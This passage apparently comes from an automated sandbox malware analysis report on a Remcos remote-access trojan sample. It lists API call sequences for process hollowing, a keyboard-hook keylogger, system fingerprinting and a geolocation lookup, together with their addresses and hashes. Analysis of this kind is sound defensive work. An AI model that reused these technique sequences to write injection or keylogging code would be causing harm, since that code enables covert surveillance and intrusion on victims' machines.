  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\Public\Libraries\lhgtogaW.pif,00000104), ref: 0040E9EE
  • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
Strings
Memory Dump Source
• Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                                                                    • String ID: 8SG$8SG$Access Level: $Administrator$C:\Users\Public\Libraries\lhgtogaW.pif$Exe$Exe$Inj$PSG$Remcos Agent initialized$Rmc-V052BG$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                                                                                                                                    • API String ID: 2830904901-1913959472
                                                                                                                                                                    • Opcode ID: a9e439ae16f60dc0f21f3a6ca9cc68708988549308dc9f1db3e32f4ba5f3dd34
                                                                                                                                                                    • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                                                                                                                                                    • Opcode Fuzzy Hash: a9e439ae16f60dc0f21f3a6ca9cc68708988549308dc9f1db3e32f4ba5f3dd34
                                                                                                                                                                    • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                     Control-flow Graph
                                                                                                                                                                     • Rendered as an image in the original report (executed / not executed blocks colour-coded); basic blocks 4180ef-41848c.
                                                                                                                                                                     • Main path: GetModuleHandleA/GetProcAddress (four ntdll resolutions), CreateProcessW, VirtualAlloc, Wow64GetThreadContext, ReadProcessMemory, NtCreateSection, NtUnmapViewOfSection, NtMapViewOfSection (target), GetCurrentProcess, NtMapViewOfSection (local), WriteProcessMemory, Wow64SetThreadContext, ResumeThread.
                                                                                                                                                                     • Failure / cleanup paths: GetLastError after a failed CreateProcessW; VirtualFree, NtClose, TerminateProcess (and GetCurrentProcess, NtUnmapViewOfSection) when a later step fails.
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                                                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                                                                                                                                                    • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 00418293
                                                                                                                                                                    • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182BB
                                                                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 004182DB
                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                                                                                                                                                    • NtClose.NTDLL(?), ref: 004182F7
                                                                                                                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                                                                                                                                                    • NtMapViewOfSection.NTDLL(?,00000000), ref: 0041834C
                                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                                                                                                                                                    • ResumeThread.KERNEL32(?), ref: 00418435
                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                                                                                                                                                    • NtUnmapViewOfSection.NTDLL(00000000), ref: 0041845E
                                                                                                                                                                    • NtClose.NTDLL(?), ref: 00418468
                                                                                                                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041847A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                                                                                                                                    • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                                                                                    • API String ID: 3150337530-3035715614
                                                                                                                                                                    • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                                                                                                                                                    • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                                                                                                                                                    • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                                                                                                                                                    • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                                                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                                                                                                                                                    • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 00418293
                                                                                                                                                                    • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182BB
                                                                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 004182DB
                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                                                                                                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                                                                                                                                                    • NtMapViewOfSection.NTDLL(?,00000000), ref: 0041834C
                                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                                                                                                                                                    • ResumeThread.KERNEL32(?), ref: 00418435
                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                                                                                                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041847A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$AddressHandleModuleProcSection$ThreadViewVirtual$ContextCreateCurrentFreeMemoryTerminateWow64$AllocErrorLastReadResumeUnmapWrite
                                                                                                                                                                    • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                                                                                    • API String ID: 1786873268-3035715614
                                                                                                                                                                    • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                                                                                                                                                    • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                                                                                                                                                    • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                                                                                                                                                    • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                     Control-flow Graph
                                                                                                                                                                     • Rendered as an image in the original report (executed / not executed blocks colour-coded); basic blocks 40a2b8-40a366.
                                                                                                                                                                     • Main path: GetModuleHandleA, SetWindowsHookExA, then a message loop of GetMessageA, TranslateMessage, DispatchMessageA.
                                                                                                                                                                     • Failure path: GetLastError followed by calls to 41bb8e, 4052fd, 402093, 41b4ef and 401fd8 (error logging) when SetWindowsHookExA fails.
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                                                                                                                                                    • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040A2ED
                                                                                                                                                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 0040A34A
                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 0040A355
                                                                                                                                                                    Strings
                                                                                                                                                                    • Keylogger initialization failure: error , xrefs: 0040A301
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                                                                    • String ID: Keylogger initialization failure: error
                                                                                                                                                                    • API String ID: 3219506041-952744263
                                                                                                                                                                    • Opcode ID: ec3267f7fe9ce1a5c416a87d0f27317f5ce465ea5ea3d17c54d1027c97c75435
                                                                                                                                                                    • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                                                                                                                                                    • Opcode Fuzzy Hash: ec3267f7fe9ce1a5c416a87d0f27317f5ce465ea5ea3d17c54d1027c97c75435
                                                                                                                                                                    • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph
APIs
• GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A416
• GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
• GetKeyboardLayout.USER32(00000000), ref: 0040A429
• GetKeyState.USER32(00000010), ref: 0040A433
• GetKeyboardState.USER32(?,?,004750F0), ref: 0040A43E
• ToUnicodeEx.USER32(00475144,0000005B,?,?,00000010,00000000,00000000), ref: 0040A461
• ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
• ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
Memory Dump Source
• Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
• String ID:
• API String ID: 1888522110-0
• Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
• Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
• Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
• Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
Uniqueness
• Uniqueness Score: -1.00%

Control-flow graph (graph image not reproduced; function blocks 274c10f1-274c11e9)
APIs
• lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 274C1137
• lstrcatW.KERNEL32(?,?), ref: 274C1151
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 274C115C
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 274C116D
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 274C117C
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 274C1193
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 274C11D0
• FindClose.KERNEL32(00000000), ref: 274C11DB
Memory Dump Source
• Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
• Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
Similarity
• API ID: lstrlen$Find$File$CloseFirstNextlstrcat
• String ID:
• API String ID: 1083526818-0
• Opcode ID: f001ca641254c74709b5338f27c189dd0b8f95dde49e071df44f16e4af5e188b
• Instruction ID: a4dbf4da1368a7619d21ab885368dd02a86d2f56fe02f68b81d492fe2fbf0bda
• Opcode Fuzzy Hash: f001ca641254c74709b5338f27c189dd0b8f95dde49e071df44f16e4af5e188b
• Instruction Fuzzy Hash: 0B219176504348ABD720EA659C49FDB7B9CEF88718F00092EBA58D3190EB78D6448B96
Uniqueness
• Uniqueness Score: -1.00%

Control-flow graph (graph image not reproduced; function blocks 41b380-41b431)
APIs
• InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
• InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
• InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
• InternetCloseHandle.WININET(00000000), ref: 0041B41C
• InternetCloseHandle.WININET(00000000), ref: 0041B41F
Strings
• http://geoplugin.net/json.gp, xrefs: 0041B3B7
Memory Dump Source
• Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Internet$CloseHandleOpen$FileRead
• String ID: http://geoplugin.net/json.gp
• API String ID: 3121278467-91888290
• Opcode ID: 715bb13e36d7f94650e38528baf69c40dba8c7692c2ea5b5f9dd98b44b5d3a7c
• Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
• Opcode Fuzzy Hash: 715bb13e36d7f94650e38528baf69c40dba8c7692c2ea5b5f9dd98b44b5d3a7c
• Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
• SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
• GetNativeSystemInfo.KERNEL32(?,0040D2A2,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
• SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
  • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
• GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
• HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
• SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
  • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
  • Part of subcall function 00412077: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
Memory Dump Source
• Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
• String ID:
• API String ID: 3950776272-0
• Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
• Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
• Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
• Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00413549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
  • Part of subcall function 00413549: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
  • Part of subcall function 00413549: RegCloseKey.KERNEL32(?), ref: 00413592
• Sleep.KERNEL32(00000BB8), ref: 0040F85B
• ExitProcess.KERNEL32 ref: 0040F8CA
Strings
Memory Dump Source
• Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: CloseExitOpenProcessQuerySleepValue
• String ID: 4.9.4 Pro$override$pth_unenc
• API String ID: 2281282204-930821335
• Opcode ID: e8f8a8c6e09656479cbd18f8005b06e309874533347df5ec8e0d67fb659a5248
                                                                                                                                                                    • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                                                                                                                                                    • Opcode Fuzzy Hash: e8f8a8c6e09656479cbd18f8005b06e309874533347df5ec8e0d67fb659a5248
                                                                                                                                                                    • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,2414F648), ref: 00433849
• CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
• CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
Memory Dump Source
• Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Crypt$Context$AcquireRandomRelease
• String ID:
• API String ID: 1815803762-0
• Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
• Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
• Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
• Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B62A
• GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
Memory Dump Source
• Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Name$ComputerUser
• String ID:
• API String ID: 4229901323-0
• Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
• Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
• Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
• Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,4.9.4 Pro), ref: 0040F8E5
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 2888965568e38a2ba7a5abe7093904758464576a93ba76aee1c710f175ee0f35
• Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
• Opcode Fuzzy Hash: 2888965568e38a2ba7a5abe7093904758464576a93ba76aee1c710f175ee0f35
• Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
• GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
• GetProcAddress.KERNEL32(00000000), ref: 0041CB88
• LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
• GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
• LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
• GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
• LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
• GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
